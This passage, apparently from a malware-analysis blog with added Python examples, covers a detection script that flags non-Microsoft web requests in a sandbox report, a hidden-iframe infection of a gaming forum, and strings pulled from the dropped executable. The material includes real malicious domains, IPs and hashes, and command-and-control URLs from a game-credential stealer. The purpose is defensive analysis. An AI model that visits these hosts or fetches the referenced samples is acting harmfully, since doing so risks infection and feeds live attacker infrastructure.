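            if not r["host"].endswith(EXPECTED_SUFFIXES):
                hits.append((r["image"], r["method"], r["host"] + r["path"]))
    return hits


def non_microsoft_urls(records):
    """Unique host+path pairs outside Microsoft: the IoC list an analyst would export."""
    urls = []
    for r in records:
        if r["event"] == "Web Request" and not r["host"].endswith(EXPECTED_SUFFIXES):
            url = r["host"] + r["path"]
            if url not in urls:
                urls.append(url)
    return urls


# Lines copied from the sandbox report above (raw string: the paths contain backslashes).
SAMPLE_REPORT = r"""
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - circutor .com - /4ethe8ep/index.html
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - diamondservice .com.au - /B0bifDVW/js.js
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron .com - /search.php?page=ac2393a35636dfa1
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - POST - activex.microsoft .com - /objects/ocget.dll
Process Created - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - %ProgramFiles%\Java\jre6\bin\java.exe - Sun Microsystems, Inc. - D600A0D8FACA5158CA8B221006997808 - 144792 bytes
Connection Established - C:\WINDOWS\system32\wuauclt.exe - UDP - 8.8.4.4 - 53
Connection Established - C:\WINDOWS\system32\wuauclt.exe - TCP - 118.212.168.131 - 80
Web Request - C:\WINDOWS\system32\wuauclt.exe - POST - kosmovodki .ru - /statnl/image.php
Web Request - %ProgramFiles%\Internet Explorer\IEXPLORE.EXE - GET - matorbaron.com - /content/field.swf
Web Request - C:\WINDOWS\explorer.exe - GET - www.microsoft .com - /isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Connection Established - %ProgramFiles%\Java\jre6\bin\java.exe - TCP - 50.116.33.235 - 80
"""

if __name__ == "__main__":
    records = parse_report(SAMPLE_REPORT)
    print("IoC URLs:", non_microsoft_urls(records))
    print("suspicious system traffic:", suspicious_system_traffic(records))
```

The rule that fires here is the simplest one: Windows Update's client has no reason to POST to a .ru domain, so any web request from that image to a non-Microsoft host is worth an alert regardless of what the payload looks like.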

Download dumped network traffic (password is urlvoid.com):

sniffed.zip / 17 KB

Hidden Iframe in MineCraftForum.Net

Users have reported to us another website infected with a hidden iframe:

hxxp://www.minecraftforum.net/

All web pages are affected!

Here is an image of the hidden iframe at the bottom of the HTML pages:

Image

When I visited the infected website, NoVirusThanks EXE Radar Pro displayed an alert about an unknown executable that tried to run on the system:

C:\Documents and Settings\User\Local Settings\Temp\scvhost.exe

Report date: 2011-06-22 11:34:41 (GMT 1)
File name: scvhost-exe
File size: 18944 bytes
MD5 hash: 5e71723d34d10648ed880af8e564f63b
SHA1 hash: 1af3dcb235e0a16eb58cebdbc0b9fb6316dc2f3b
Detection rate: 0 on 5 (0%)
Status: CLEAN

Thanks to NoVirusThanks EXE Radar Pro, I was able to block and delete the unknown and malicious executable file, preventing the system from being infected.

Some ASCII strings extracted from the PE file:

Type: ASCII
RVA: 00006CE2
Offset: 000040E2
Size: 0000000D
Value: GuardCore.dll
 
Type: ASCII
RVA: 00006EBC
Offset: 000042BC
Size: 00000024
Value: hxxp://www.dashangu.com/new/getw.asp
 
Type: ASCII
RVA: 00006EFF
Offset: 000042FF
Size: 00000006
Value: server
 
Type: ASCII
RVA: 00006F14
Offset: 00004314
Size: 0000000E
Value: WTF\Config.wtf
 
Type: ASCII
RVA: 00006F24
Offset: 00004324
Size: 0000000A
Value: realmName 
 
Type: ASCII
RVA: 00006F35
Offset: 00004335
Size: 00000005
Value: Right
 
Type: ASCII
RVA: 00006F4C
Offset: 0000434C
Size: 00000024
Value: hxxp://www.dashangu.com/new/getr.asp
 
Type: ASCII
RVA: 00006F74
Offset: 00004374
Size: 00000011
Value: JAGEXLAUNCHER.EXE
 
Type: ASCII
RVA: 00006F88
Offset: 00004388
Size: 00000007
Value: WOW.EXn
 
Type: ASCII
RVA: 00006F90
Offset: 00004390
Size: 00000007
Value: WinInet
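The string dump above pairs each value with both its file offset and its RVA; the following added Python example (not the tool used in the post) shows how that mapping is made. It reads the PE section table, extracts printable ASCII runs, converts each file offset to an RVA through the section that contains it, and prints records in the same Type/RVA/Offset/Size/Value layout. The PE image and its payload are constructed inside the script (a one-section file with placeholder strings; the URL points at example.invalid), so it runs without any sample from the post.

```python
"""Extract ASCII strings from a PE file and report each one with its file
offset and its RVA, in the layout used in the post above. Added example,
not the tool used in the post. The toy PE built at the bottom is constructed
for the demonstration; the section geometry is an assumption.
"""
import re
import struct


def parse_sections(data):
    """Read the PE section table: list of (name, virtual_address, raw_pointer, raw_size)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER starts here
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size                          # section headers follow the optional header
    sections = []
    for i in range(nsections):
        name, _vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, raw_ptr, raw_size))
    return sections


def offset_to_rva(offset, sections):
    """Map a file offset to an RVA via the section whose raw data contains it; None if in no section."""
    for _name, va, raw_ptr, raw_size in sections:
        if raw_ptr <= offset < raw_ptr + raw_size:
            return va + (offset - raw_ptr)
    return None


def extract_strings(data, sections, min_len=5):
    """Printable ASCII runs of at least `min_len` bytes, with offset, RVA and size."""
    records = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        records.append({
            "offset": m.start(),
            "rva": offset_to_rva(m.start(), sections),
            "size": len(m.group()),
            "value": m.group().decode("ascii"),
        })
    return records


def format_record(rec):
    """Render one record in the Type/RVA/Offset/Size/Value layout used in the post."""
    rva = "%08X" % rec["rva"] if rec["rva"] is not None else "--------"
    return "Type: ASCII\nRVA: %s\nOffset: %08X\nSize: %08X\nValue: %s" % (
        rva, rec["offset"], rec["size"], rec["value"])


# ---- constructed toy PE: MZ stub, PE signature, COFF header, one section ----
def build_toy_pe(payload, va=0x6000, raw_ptr=0x400):
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)  # i386, 1 section, no optional header
    section = struct.pack("<8sIIIIIIHHI", b".data", len(payload), va, len(payload), raw_ptr,
                          0, 0, 0, 0, 0x40000040)
    header = dos + b"PE\0\0" + coff + section
    return header.ljust(raw_ptr, b"\0") + payload


# Constructed section contents: a few strings separated by non-printable bytes.
SAMPLE_PAYLOAD = (
    b"\x00\x01\x02" + b"GuardCore.dll" + b"\x00\x7f\x80"
    + b"hxxp://example.invalid/getw.asp" + b"\x00\x00"
    + b"realmName " + b"\x00\x03" + b"WinInet" + b"\x00\xff"
)

if __name__ == "__main__":
    image = build_toy_pe(SAMPLE_PAYLOAD)
    secs = parse_sections(image)
    for rec in extract_strings(image, secs):
        print(format_record(rec))
        print()
```

Note that ".data" itself is reported with no RVA: the section name lives in the header, outside every section's raw data, which is also why a strings tool that only knows file offsets cannot tell you where a string is mapped in memory.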

URLVoid domain analysis:

http://www.urlvoid.com/scan/minecraftforum.net

16:38PM UPDATE:

The website appears to be under maintenance now, so it will probably be fixed soon.